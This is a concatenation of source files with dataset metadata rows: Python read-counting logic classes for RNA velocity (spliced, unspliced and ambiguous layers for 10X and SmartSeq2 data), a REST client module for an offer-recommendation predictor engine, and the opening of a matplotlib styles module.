                                has_exseg_with_spliced_flag = 1
                    # Fold the per-model evidence into the molecule-level flags
                    if has_validated_intron and not has_exons:
                        has_onlyintron_and_valid_model = 1
                    if has_introns and not has_exons:
                        has_onlyintron_model = 1
                    if has_exons and not has_introns:
                        has_onlyexo_model = 1
                    if has_exons and has_introns and not has_validated_intron and not has_exin_intron_span:
                        has_invalid_mixed_model = 1
                        has_mixed_model = 1
                    if has_exons and has_introns and has_validated_intron and not has_exin_intron_span:
                        has_valid_mixed_model = 1
                        has_mixed_model = 1
                    if not has_exin_intron_span:
                        has_only_span_exin_model = 0
                if multi_gene:
                    # many genes are compatible with the observation, do not count
                    return
                else:
                    if not len(molitem.mappings_record):
                        # no gene is compatible with the observation, do not count
                        return
                    else:
                        # NOTE(review): gene_ix below uses transcript_model/segments_list from the
                        # last loop iteration; valid because all models share one geneid here
                        if has_onlyexo_model and not has_onlyintron_model and not has_mixed_model:
                            # More common situation, normal exonic read, count as spliced
                            gene_ix = geneid2ix[transcript_model.geneid]
                            spliced[gene_ix, cell_bcidx] += 1
                            return
                        if has_only_span_exin_model:
                            # All the compatible transcript models have spanning exon-intron boundaries, count unspliced
                            gene_ix = geneid2ix[transcript_model.geneid]
                            unspliced[gene_ix, cell_bcidx] += 1
                            return
                        if has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
                            if len(segments_list) == 1:
                                # Singleton in validated intron, do not count
                                return
                            else:
                                # Non singleton in validated intron
                                gene_ix = geneid2ix[transcript_model.geneid]
                                unspliced[gene_ix, cell_bcidx] += 1
                                return
                        if has_onlyintron_model and not has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
                            if len(segments_list) == 1:
                                # Singleton in non-validated intron, do not count
                                return
                            else:
                                # Non-singleton in non-validated intron, do not count
                                return
                        if has_invalid_mixed_model and not has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
                            # Not validated and mapping to exon and introns, happens rarely in 10X / irrelevant.
                            return
                        if has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
                            # Validated and mapping to exon and introns, happens rarely in 10X. Count as unspliced.
                            gene_ix = geneid2ix[transcript_model.geneid]
                            unspliced[gene_ix, cell_bcidx] += 1
                            return
                        if has_onlyintron_model and has_onlyexo_model and not has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping, most common case! Count ambiguous
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return
                        if has_onlyintron_model and not has_onlyexo_model and has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping. Very rare.
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return
                        if not has_onlyintron_model and has_onlyexo_model and has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping. Count ambiguous
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return
                        if has_onlyintron_model and has_onlyexo_model and has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping. Very rare.
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return
class ObservedSpanning10X(Logic):
    """ObservedSpanning10X logic for the 10X Genomics chemistry.

    This differs from the other 10x logics because:
    - singletons falling in non-validated introns are DISCARDED
    - singletons falling in validated introns are DISCARDED
    - non-singletons supported by non-validated introns are DISCARDED
    - non-singletons supported by validated introns are DISCARDED
    - Therefore only the observed intron-spanning reads are counted as UNSPLICED
    """
    def __init__(self) -> None:
        self.name = "ObservedSpanning10X"
    @property
    def layers(self) -> List[str]:  # This should be overridden if a different set of layers is desired
        return ["spliced", "unspliced", "ambiguous"]
    @property
    def stranded(self) -> bool:
        return True
    @property
    def perform_validation_markup(self) -> bool:
        return True
    @property
    def accept_discordant(self) -> bool:
        return False
    def count(self, molitem: vcy.Molitem, cell_bcidx: int, dict_layers_columns: Dict[str, np.ndarray], geneid2ix: Dict[str, int]) -> None:
        """Attribute the molecule to a layer by incrementing the buffers in place.

        Returns None in all cases; counting happens via side effects on the
        spliced/unspliced/ambiguous layer buffers.
        """
        # NOTE This can be simplified quite a bit, without loss of accuracy!
        spliced = dict_layers_columns["spliced"]
        unspliced = dict_layers_columns["unspliced"]
        ambiguous = dict_layers_columns["ambiguous"]
        # The hits are not compatible with any annotated transcript model
        if len(molitem.mappings_record) == 0:
            return
        # Compatible with one or more transcript models:
        else:
            # Check that there are not different possible genes
            if len(set(i.geneid for i in molitem.mappings_record.keys())) == 1:
                gene_check: Set[str] = set()
                # Molecule-level flags, aggregated over all compatible transcript models
                has_onlyintron_model = 0
                has_only_span_exin_model = 1
                has_onlyintron_and_valid_model = 0
                has_valid_mixed_model = 0
                has_invalid_mixed_model = 0
                has_onlyexo_model = 0
                has_mixed_model = 0
                multi_gene = 0
                for transcript_model, segments_list in molitem.mappings_record.items():
                    gene_check.add(transcript_model.geneid)
                    if len(gene_check) > 1:
                        multi_gene = 1
                    # Per-transcript-model evidence flags
                    has_introns = 0
                    has_exons = 0
                    has_exseg_with_spliced_flag = 0
                    has_validated_intron = 0
                    has_exin_intron_span = 0
                    has_non3prime = 0
                    for segment_match in segments_list:
                        if segment_match.maps_to_intron:
                            has_introns = 1
                            if segment_match.feature.is_validated:
                                has_validated_intron = 1
                                # Detect reads spanning an exon-intron boundary on either side
                                if segment_match.feature.end_overlaps_with_part_of(segment_match.segment):
                                    downstream_exon = segment_match.feature.get_downstream_exon()
                                    if downstream_exon.start_overlaps_with_part_of(segment_match.segment):
                                        has_exin_intron_span = 1
                                if segment_match.feature.start_overlaps_with_part_of(segment_match.segment):
                                    upstream_exon = segment_match.feature.get_upstream_exon()
                                    if upstream_exon.end_overlaps_with_part_of(segment_match.segment):
                                        has_exin_intron_span = 1
                        elif segment_match.maps_to_exon:
                            has_exons = 1
                            if not segment_match.feature.is_last_3prime:
                                has_non3prime = 1
                            if segment_match.is_spliced:
                                has_exseg_with_spliced_flag = 1
                    # Fold the per-model evidence into the molecule-level flags
                    if has_validated_intron and not has_exons:
                        has_onlyintron_and_valid_model = 1
                    if has_introns and not has_exons:
                        has_onlyintron_model = 1
                    if has_exons and not has_introns:
                        has_onlyexo_model = 1
                    if has_exons and has_introns and not has_validated_intron and not has_exin_intron_span:
                        has_invalid_mixed_model = 1
                        has_mixed_model = 1
                    if has_exons and has_introns and has_validated_intron and not has_exin_intron_span:
                        has_valid_mixed_model = 1
                        has_mixed_model = 1
                    if not has_exin_intron_span:
                        has_only_span_exin_model = 0
                if multi_gene:
                    # Many genes are compatible with the observation, do not count
                    return
                else:
                    if not len(molitem.mappings_record):
                        # No gene is compatible with the observation, do not count
                        return
                    else:
                        # NOTE(review): gene_ix below uses transcript_model/segments_list from the
                        # last loop iteration; valid because all models share one geneid here
                        if has_onlyexo_model and not has_onlyintron_model and not has_mixed_model:
                            # More common situation, normal exonic read, count as spliced
                            gene_ix = geneid2ix[transcript_model.geneid]
                            spliced[gene_ix, cell_bcidx] += 1
                            return
                        if has_only_span_exin_model:
                            # All the compatible transcript models have spanning exon-intron boundaries, count unspliced
                            gene_ix = geneid2ix[transcript_model.geneid]
                            unspliced[gene_ix, cell_bcidx] += 1
                            return
                        if has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
                            if len(segments_list) == 1:
                                # Singleton in validated intron, do not count
                                return
                            else:
                                # Non-singleton in validated intron, do not count
                                return
                        if has_onlyintron_model and not has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
                            if len(segments_list) == 1:
                                # Singleton in non-validated intron, do not count
                                return
                            else:
                                # Non-singleton in non-validated intron, do not count
                                return
                        if has_invalid_mixed_model and not has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
                            # Not validated and mapping to exon and introns, happens rarely in 10X / irrelevant.
                            return
                        if has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
                            # Validated and mapping to exon and introns, happens rarely in 10X. Count as unspliced.
                            gene_ix = geneid2ix[transcript_model.geneid]
                            unspliced[gene_ix, cell_bcidx] += 1
                            return
                        if has_onlyintron_model and has_onlyexo_model and not has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping, most common case! Count ambiguous
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return
                        if has_onlyintron_model and not has_onlyexo_model and has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping. Very rare.
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return
                        if not has_onlyintron_model and has_onlyexo_model and has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping. Count ambiguous
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return
                        if has_onlyintron_model and has_onlyexo_model and has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping. Very rare.
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return
class Discordant10X(Logic):
    """Just a test

    Counting logic that also accepts discordantly mapped reads
    (``accept_discordant`` is True). Each molecule is assigned to one of
    the "spliced", "unspliced" or "ambiguous" layers.
    """
    def __init__(self) -> None:
        self.name = "Discordant10X"
    @property
    def layers(self) -> List[str]:  # This should be overridden if a different set of layers is desired
        return ["spliced", "unspliced", "ambiguous"]
    @property
    def stranded(self) -> bool:
        return True
    @property
    def perform_validation_markup(self) -> bool:
        return True
    @property
    def accept_discordant(self) -> bool:
        return True
    def count(self, molitem: vcy.Molitem, cell_bcidx: int, dict_layers_columns: Dict[str, np.ndarray], geneid2ix: Dict[str, int]) -> None:
        """Classify one molecule and increment the matching layer count.

        Arguments
        ---------
        molitem: molecule with its transcript-model mappings record.
        cell_bcidx: column index of the cell barcode in the layer matrices.
        dict_layers_columns: layer name -> (genes x cells) count matrix.
        geneid2ix: gene id -> row index in the layer matrices.

        Mutates the layer matrices in place and returns None. Molecules
        compatible with several genes, or with no transcript model, are
        not counted.
        """
        # NOTE This can be simplified qyuite a bit, without loss of acuracy!
        # The hits are not compatible with any annotated transcript model
        spliced = dict_layers_columns["spliced"]
        unspliced = dict_layers_columns["unspliced"]
        ambiguous = dict_layers_columns["ambiguous"]
        # The hits are not compatible with any annotated transcript model
        if len(molitem.mappings_record) == 0:
            return
        # Compatible with one or more transcript models:
        else:
            # Check that there are not different possible genes ??
            if len(set(i.geneid for i in molitem.mappings_record.keys())) == 1:
                # Flags summarizing, over ALL compatible transcript models,
                # where the molecule's segments landed.
                # has_only_span_exin_model starts at 1 and is cleared by any
                # model whose hits do NOT span an exon-intron boundary.
                gene_check: Set[str] = set()
                has_onlyintron_model = 0
                has_only_span_exin_model = 1
                has_onlyintron_and_valid_model = 0
                has_valid_mixed_model = 0
                has_invalid_mixed_model = 0
                has_onlyexo_model = 0
                has_mixed_model = 0
                multi_gene = 0
                for transcript_model, segments_list in molitem.mappings_record.items():
                    gene_check.add(transcript_model.geneid)
                    if len(gene_check) > 1:
                        multi_gene = 1
                    # Per-model flags, reset for every transcript model.
                    has_introns = 0
                    has_exons = 0
                    has_exseg_with_spliced_flag = 0  # set but never read by this logic
                    has_validated_intron = 0
                    has_exin_intron_span = 0
                    has_non3prime = 0  # set but never read by this logic
                    for segment_match in segments_list:
                        if segment_match.maps_to_intron:
                            has_introns = 1
                            if segment_match.feature.is_validated:
                                has_validated_intron = 1
                                # Does the segment bridge this intron's 3' end into the downstream exon?
                                if segment_match.feature.end_overlaps_with_part_of(segment_match.segment):
                                    downstream_exon = segment_match.feature.get_downstream_exon()
                                    if downstream_exon.start_overlaps_with_part_of(segment_match.segment):
                                        has_exin_intron_span = 1
                                # Does the segment bridge this intron's 5' start into the upstream exon?
                                if segment_match.feature.start_overlaps_with_part_of(segment_match.segment):
                                    upstream_exon = segment_match.feature.get_upstream_exon()
                                    if upstream_exon.end_overlaps_with_part_of(segment_match.segment):
                                        has_exin_intron_span = 1
                        elif segment_match.maps_to_exon:
                            has_exons = 1
                            if not segment_match.feature.is_last_3prime:
                                has_non3prime = 1
                            if segment_match.is_spliced:
                                has_exseg_with_spliced_flag = 1
                    # Fold this model's evidence into the molecule-level flags.
                    if has_validated_intron and not has_exons:
                        has_onlyintron_and_valid_model = 1
                    if has_introns and not has_exons:
                        has_onlyintron_model = 1
                    if has_exons and not has_introns:
                        has_onlyexo_model = 1
                    if has_exons and has_introns and not has_validated_intron and not has_exin_intron_span:
                        has_invalid_mixed_model = 1
                        has_mixed_model = 1
                    if has_exons and has_introns and has_validated_intron and not has_exin_intron_span:
                        has_valid_mixed_model = 1
                        has_mixed_model = 1
                    if not has_exin_intron_span:
                        has_only_span_exin_model = 0
                # NOTE(review): transcript_model and segments_list below refer to
                # the LAST item of the loop above. The geneid is safe because all
                # models share one gene (checked), but the len(segments_list)
                # singleton tests inspect only the last model — confirm intended.
                if multi_gene:
                    # Many genes are compatible with the observation, do not count
                    return
                else:
                    if not len(molitem.mappings_record):
                        # No gene is compatible with the observation, do not count
                        return
                    else:
                        if has_onlyexo_model and not has_onlyintron_model and not has_mixed_model:
                            # More common situation, normal exonic read, count as spliced
                            gene_ix = geneid2ix[transcript_model.geneid]
                            spliced[gene_ix, cell_bcidx] += 1
                            return
                        if has_only_span_exin_model:
                            # All the compatible transcript models have spanning exon-intron boundaries, count unspliced
                            gene_ix = geneid2ix[transcript_model.geneid]
                            unspliced[gene_ix, cell_bcidx] += 1
                            return
                        if has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
                            if len(segments_list) == 1:
                                # Singleton in validated intron
                                gene_ix = geneid2ix[transcript_model.geneid]
                                unspliced[gene_ix, cell_bcidx] += 1
                                return
                            else:
                                # Non-singleton in validated intron
                                gene_ix = geneid2ix[transcript_model.geneid]
                                unspliced[gene_ix, cell_bcidx] += 1
                                return
                        if has_onlyintron_model and not has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
                            if len(segments_list) == 1:
                                # Singleton in non-validated intron
                                gene_ix = geneid2ix[transcript_model.geneid]
                                unspliced[gene_ix, cell_bcidx] += 1
                                return
                            else:
                                # Non-singleton in non-validated intron
                                gene_ix = geneid2ix[transcript_model.geneid]
                                unspliced[gene_ix, cell_bcidx] += 1
                                return
                        if has_invalid_mixed_model and not has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
                            # Not validated and mapping to exon and introns, happens rarely in 10X / irrelevant. Count anyways
                            gene_ix = geneid2ix[transcript_model.geneid]
                            unspliced[gene_ix, cell_bcidx] += 1
                            return
                        if has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
                            # Validated and mapping to exon and introns, happens rarely in 10X. Count as unspliced.
                            gene_ix = geneid2ix[transcript_model.geneid]
                            unspliced[gene_ix, cell_bcidx] += 1
                            return
                        if has_onlyintron_model and has_onlyexo_model and not has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping, most common case! Count ambiguous
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return
                        if has_onlyintron_model and not has_onlyexo_model and has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping. Very rare. Count ambiguous
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return
                        if not has_onlyintron_model and has_onlyexo_model and has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping. Count ambiguous
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return
                        if has_onlyintron_model and has_onlyexo_model and has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping. Very rare. Count ambiguous
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return
class SmartSeq2(Logic):
    """SmartSeq2 logic

    Unstranded, no intron validation markup, no discordant reads. Adds a
    fourth "spanning" layer for molecules whose every compatible model
    spans an exon-intron boundary.
    """
    def __init__(self) -> None:
        self.name = "SmartSeq2"
    @property
    def layers(self) -> List[str]:  # This should be overridden if a different set of layers is desired
        return ["spliced", "unspliced", "ambiguous", "spanning"]
    @property
    def stranded(self) -> bool:
        return False
    @property
    def perform_validation_markup(self) -> bool:
        return False
    @property
    def accept_discordant(self) -> bool:
        return False
    def count(self, molitem: vcy.Molitem, cell_bcidx: int, dict_layers_columns: Dict[str, np.ndarray], geneid2ix: Dict[str, int]) -> None:
        """Classify one molecule and increment the matching layer count.

        Arguments
        ---------
        molitem: molecule with its transcript-model mappings record.
        dict_layers_columns: layer name -> (genes x cells) count matrix;
            must contain "spliced", "unspliced", "ambiguous", "spanning".
        cell_bcidx / geneid2ix: column / row indexes into those matrices.

        Mutates the layer matrices in place and returns None.
        """
        # NOTE This can be simplified qyuite a bit, without loss of acuracy!
        # The hits are not compatible with any annotated transcript model
        spliced = dict_layers_columns["spliced"]
        unspliced = dict_layers_columns["unspliced"]
        ambiguous = dict_layers_columns["ambiguous"]
        spanning = dict_layers_columns["spanning"]
        if len(molitem.mappings_record) == 0:
            return
        # Compatible with one or more transcript models:
        else:
            # Check that there are not different possible genes ??
            if len(set(i.geneid for i in molitem.mappings_record.keys())) == 1:
                # Molecule-level flags accumulated over all transcript models.
                # has_only_span_exin_model starts at 1 and is cleared by any
                # model whose hits do NOT span an exon-intron boundary.
                gene_check: Set[str] = set()
                has_onlyintron_model = 0
                has_only_span_exin_model = 1
                has_onlyexo_model = 0
                has_mixed_model = 0
                multi_gene = 0
                for transcript_model, segments_list in molitem.mappings_record.items():
                    gene_check.add(transcript_model.geneid)
                    if len(gene_check) > 1:
                        multi_gene = 1
                    # Per-model flags, reset for every transcript model.
                    has_introns = 0
                    has_exons = 0
                    has_exseg_with_spliced_flag = 0  # set but never read by this logic
                    has_exin_intron_span = 0
                    for segment_match in segments_list:
                        if segment_match.maps_to_intron:
                            has_introns = 1
                            # No is_validated gate here: validation markup is off
                            # for SmartSeq2 (perform_validation_markup is False).
                            if segment_match.feature.end_overlaps_with_part_of(segment_match.segment):
                                downstream_exon = segment_match.feature.get_downstream_exon()
                                if downstream_exon.start_overlaps_with_part_of(segment_match.segment):
                                    has_exin_intron_span = 1
                            if segment_match.feature.start_overlaps_with_part_of(segment_match.segment):
                                upstream_exon = segment_match.feature.get_upstream_exon()
                                if upstream_exon.end_overlaps_with_part_of(segment_match.segment):
                                    has_exin_intron_span = 1
                        elif segment_match.maps_to_exon:
                            has_exons = 1
                            if segment_match.is_spliced:
                                has_exseg_with_spliced_flag = 1
                    if has_introns and not has_exons:
                        has_onlyintron_model = 1
                    if has_exons and not has_introns:
                        has_onlyexo_model = 1
                    if has_exons and has_introns and not has_exin_intron_span:
                        has_valid_mixed_model = 1  # set but never read by this logic
                        has_mixed_model = 1
                    if not has_exin_intron_span:
                        has_only_span_exin_model = 0
                # NOTE(review): transcript_model below is the last loop item;
                # safe because all models share one geneid (checked above).
                if multi_gene:
                    # Many genes are compatible with the observation, do not count
                    return
                else:
                    if not len(molitem.mappings_record):
                        # NOTE it does not happen for Smartseq2
                        # No gene is compatible with the observation, do not count
                        return
                    else:
                        if has_onlyexo_model and not has_onlyintron_model and not has_mixed_model:
                            # More common situation, normal exonic read, count as spliced
                            gene_ix = geneid2ix[transcript_model.geneid]
                            spliced[gene_ix, cell_bcidx] += 1
                            return
                        if has_only_span_exin_model:
                            # NOTE This is what I want to count as spanning
                            # All the compatible transcript models have spanning exon-intron boundaries, count unspliced
                            gene_ix = geneid2ix[transcript_model.geneid]
                            spanning[gene_ix, cell_bcidx] += 1
                            return
                        if has_onlyintron_model and not has_mixed_model and not has_onlyexo_model:
                            # Intron-only models: count as unspliced
                            gene_ix = geneid2ix[transcript_model.geneid]
                            unspliced[gene_ix, cell_bcidx] += 1
                            return
                        if has_onlyintron_model and has_onlyexo_model and not has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping, most common case! Count ambiguous
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return
                        if not has_onlyintron_model and has_onlyexo_model and has_mixed_model:
                            # NOTE has_mixed model is used only here in this logic
                            # Ambiguity among the transcript models compatible with the mapping. Count ambiguous
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return
# Logic class used when the caller does not specify one explicitly.
Default: type = Permissive10X
| 55.770779
| 169
| 0.536536
| 6,714
| 63,746
| 4.809651
| 0.036491
| 0.028614
| 0.039019
| 0.043788
| 0.958844
| 0.958844
| 0.953456
| 0.951443
| 0.949647
| 0.949616
| 0
| 0.012987
| 0.421391
| 63,746
| 1,142
| 170
| 55.819615
| 0.862515
| 0.180921
| 0
| 0.961894
| 0
| 0
| 0.00908
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054273
| false
| 0
| 0.004619
| 0.035797
| 0.218245
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dd21e1e0a59ba73af63b160fee5eecec090f10a1
| 7,836
|
py
|
Python
|
runtime/apis/predictor_engine.py
|
ecosystemai/ecosystem-notebooks
|
7282f22fbe7ab7a43b2b0c06c74b3f176defaca4
|
[
"MIT"
] | 2
|
2020-08-30T12:50:47.000Z
|
2020-11-24T12:59:43.000Z
|
runtime/apis/predictor_engine.py
|
ecosystemai/ecosystem-notebooks
|
7282f22fbe7ab7a43b2b0c06c74b3f176defaca4
|
[
"MIT"
] | null | null | null |
runtime/apis/predictor_engine.py
|
ecosystemai/ecosystem-notebooks
|
7282f22fbe7ab7a43b2b0c06c74b3f176defaca4
|
[
"MIT"
] | 2
|
2020-09-02T16:54:25.000Z
|
2021-06-20T20:30:11.000Z
|
from runtime.endpoints import predictor_engine as endpoints
from runtime import request_utils
def get_spending_personality(auth, campaign, channel, customer, headers, params, subcampaign, userid):
    """Provide spending personality scores for customers.

    auth: Authentication token generated by access.Authenticate().
    campaign: The name of the campaign. (string)
    channel: The type of channel. (options: "all", "")
    customer: The id of the customer. (string)
    headers: Added headers.
    params: Additional parameters added in a dictionary format as a
        string: ('{"value_1": 300, "value_2": "entry"}')
    subcampaign: Name of the subcampaigns. (string)
    userid: The id of the user. (string)
    """
    payload = {
        "campaign": campaign,
        "channel": channel,
        "customer": customer,
        "headers": headers,
        "params": params,
        "subcampaign": subcampaign,
        "userid": userid,
    }
    response = request_utils.create(
        auth, endpoints.GET_SPENDING_PERSONALITY, params=payload
    )
    return response.json()
def put_spending_personality(auth, document, headers):
    """Update offers taken up by customers.

    document: Documents to be updated.
    headers: Added headers.
    """
    payload = {"document": document, "headers": headers}
    response = request_utils.create(
        auth, endpoints.PUT_SPENDING_PERSONALITY, params=payload
    )
    return response.json()
def model_detail(auth, model):
    # Model details.
    # model: Model's details to examine. Example parameter: {'mojo':'my_mojo.zip'}
    # NOTE(review): this calls GET_OFFER_RECOMMENDATIONS rather than a
    # model-detail endpoint — likely a copy/paste slip; confirm the intended
    # endpoint constant before changing.
    ep = endpoints.GET_OFFER_RECOMMENDATIONS
    param_dict = {
        "model": model
    }
    resp = request_utils.create(auth, ep, params=param_dict)
    meta = resp.json()
    return meta
def get_offer_recommendations(auth, campaign, channel, customer, headers, numberoffers, params, subcampaign, userid):
    """Provide offers that form part of a campaign for a particular customer.

    auth: Authentication token generated by access.Authenticate().
    campaign: The name of the campaign. (string)
    channel: The type of channel. (options: "all", "")
    customer: The id of the customer. (string)
    headers: Added headers.
    numberoffers: Number of offers to get. (int)
    params: Additional parameters added in a dictionary format as a
        string: ('{"value_1": 300, "value_2": "entry"}')
    subcampaign: Name of the subcampaigns. (string)
    userid: The id of the user. (string)
    """
    payload = {
        "campaign": campaign,
        "channel": channel,
        "customer": customer,
        "headers": headers,
        "numberoffers": numberoffers,
        "params": params,
        "subcampaign": subcampaign,
        "userid": userid,
    }
    response = request_utils.create(
        auth, endpoints.GET_OFFER_RECOMMENDATIONS, params=payload
    )
    return response.json()
def put_offer_recommendations(auth, document, headers):
    """Update offers taken up by customers.

    document: Documents to be updated.
    headers: Added headers.
    """
    payload = {"document": document, "headers": headers}
    response = request_utils.create(
        auth, endpoints.PUT_OFFER_RECOMMENDATIONS, params=payload
    )
    return response.json()
def get_personality_recommender(auth, campaign, channel, customer, headers, numberoffers, params, subcampaign, userid):
    """Provide offers that form part of a campaign for a particular customer.

    auth: Authentication token generated by access.Authenticate().
    campaign: The name of the campaign. (string)
    channel: The type of channel. (options: "all", "")
    customer: The id of the customer. (string)
    headers: Added headers.
    numberoffers: Number of offers to get. (int)
    params: Additional parameters added in a dictionary format as a
        string: ('{"value_1": 300, "value_2": "entry"}')
    subcampaign: Name of the subcampaigns. (string)
    userid: The id of the user. (string)
    """
    payload = {
        "campaign": campaign,
        "channel": channel,
        "customer": customer,
        "headers": headers,
        "numberoffers": numberoffers,
        "params": params,
        "subcampaign": subcampaign,
        "userid": userid,
    }
    response = request_utils.create(
        auth, endpoints.GET_PERSONALITY_RECOMMENDER, params=payload
    )
    return response.json()
def put_personality_recommender(auth, document, headers):
    """Update offers taken up by customers.

    document: Documents to be updated.
    headers: Added headers.
    """
    payload = {"document": document, "headers": headers}
    response = request_utils.create(
        auth, endpoints.PUT_PERSONALITY_RECOMMENDER, params=payload
    )
    return response.json()
def predictor_response_preload(auth, detail, value):
    """Perform prediction on a pre-loaded model with detail: none, basic or all.

    Performs a database lookup if a properties file has been set. The
    predictor parameters are broken into two types: either all parameters
    are supplied via the API, or a lookup key is supplied via the API and
    the parameters are extracted from a data source.

    detail: Documents to be updated. (string: "none", "basic", "all")
    value: Input parameter. For direct input params:
        {'name':'predict1', 'mojo':'model_mojo.zip', 'dbparam':false,
         'input': ['x','y'], 'value': ['val_x', 'val_y']}
    For inputs from a data source:
        {'name':'predict1', 'mojo':'model_mojo.zip', 'dbparam':true,
         'lookup':{key:'customer',value:1234567890}}
    For post-scoring logic:
        {'name':'predict1', 'mojo':'1',
         'mab':{'class':'mabone', 'epsilon':0.4}, 'dbparam':true,
         'lookup':{key:'customer',value:1234567890},
         'param':{key:'value_field', value:30}}
    """
    payload = {"detail": detail, "value": value}
    response = request_utils.create(
        auth, endpoints.PREDICTOR_RESPONSE_PRELOAD, params=payload
    )
    return response.json()
def predictor_response_preload_kafka(auth, detail, value):
    """Perform prediction on a pre-loaded model and push onto a Kafka topic.

    Detail is one of: none, basic or all. Performs a database lookup if a
    properties file has been set.

    detail: Documents to be updated. (string: "none", "basic", "all")
    value: Input parameter, either
        {'name':'predict1', 'kafka':{'TOPIC_NAME':'ecosystem1','log':'true'},
         'mojo':'1', 'input':['x','y'], 'value':['val_x','val_y']}
    or
        {'name':'predict1', 'kafka':{'TOPIC_NAME':'ecosystem1','log':'true'},
         'mojo':'1', 'dbparam':true, 'lookup':{key:'customer',value:'1234567890'}}
    """
    payload = {"detail": detail, "value": value}
    response = request_utils.create(
        auth, endpoints.PREDICTOR_RESPONSE_PRELOAD_KAFKA, params=payload
    )
    return response.json()
def refresh(auth, headers):
    """Refresh product matrix and master.

    headers: Added headers.
    """
    payload = {"headers": headers}
    response = request_utils.create(auth, endpoints.REFRESH, params=payload)
    return response.json()
def run_model_mojo(auth, detail, value):
    """Perform basic prediction on a model with detail: none, basic or all.

    detail: Documents to be updated. (string: "none", "basic", "all")
    value: Input parameter, e.g.
        {'mojo':'model_mojo.zip', 'input': ['x','y'],
         'value': ['val_x', 'val_y']}
    """
    payload = {"detail": detail, "value": value}
    response = request_utils.create(
        auth, endpoints.RUN_MODEL_MOJO, params=payload
    )
    return response.json()
| 34.368421
| 119
| 0.659265
| 949
| 7,836
| 5.343519
| 0.17176
| 0.039046
| 0.034707
| 0.047722
| 0.805758
| 0.779333
| 0.773417
| 0.719779
| 0.707947
| 0.707947
| 0
| 0.009559
| 0.212353
| 7,836
| 227
| 120
| 34.519824
| 0.812054
| 0.497192
| 0
| 0.706897
| 0
| 0
| 0.071094
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.094828
| false
| 0
| 0.017241
| 0
| 0.206897
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dd2597914ea40af4fd7b259e6a3651c1a4dd1cf2
| 5,888
|
py
|
Python
|
matplotlibstyles/styles.py
|
cumberworth/matplotlibstyles
|
1e5fbd7dcb249067d33f89e47291b279e0e3932e
|
[
"MIT"
] | null | null | null |
matplotlibstyles/styles.py
|
cumberworth/matplotlibstyles
|
1e5fbd7dcb249067d33f89e47291b279e0e3932e
|
[
"MIT"
] | null | null | null |
matplotlibstyles/styles.py
|
cumberworth/matplotlibstyles
|
1e5fbd7dcb249067d33f89e47291b279e0e3932e
|
[
"MIT"
] | null | null | null |
"""Styles for creating plots with matplotlib."""
import matplotlib as mpl
from matplotlib import pyplot as plt
# LaTeX preamble shared by the pgf-based styles below: loads fonts (STIX Two)
# and declares the SI units used in figure labels.
SHARE_PGF_PREAMBLE = "\n".join(
    [
